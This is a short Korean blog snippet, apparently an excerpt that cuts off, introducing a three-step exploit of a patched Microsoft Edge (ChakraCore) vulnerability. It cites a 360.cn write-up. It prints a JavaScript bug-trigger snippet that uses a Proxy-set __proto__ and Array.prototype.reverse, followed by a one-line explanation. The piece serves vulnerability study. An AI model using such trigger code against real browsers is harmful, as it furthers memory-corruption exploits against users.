Browser Exploit -> 3 step to exploit edge
출처: http://blogs.360.cn/blog/three-roads-lead-to-rome-2/ ChakraCore: https://github.com/Microsoft/ChakraCore 설명하는 edge 취약점은 이미 해결된 취약점이다. var intarr = new Array(1, 2, 3, 4, 5, 6, 7) var arr = new Array(alert) arr.length = 24 arr.__proto__ = new Proxy({}, {getPrototypeOf:function() {return intarr}}) arr.__proto__.reverse = Array.prototype.reverse arr.reverse() Bug trigger code이다. __proto__ 구성은 함수에만 해당되는 속성이다. JS에서는 함수를 정의하고 파싱단계에 들어가면 내부적으로 수행되는 소개 더보기 Browser Exploit -> 3 step to exploit edge[…]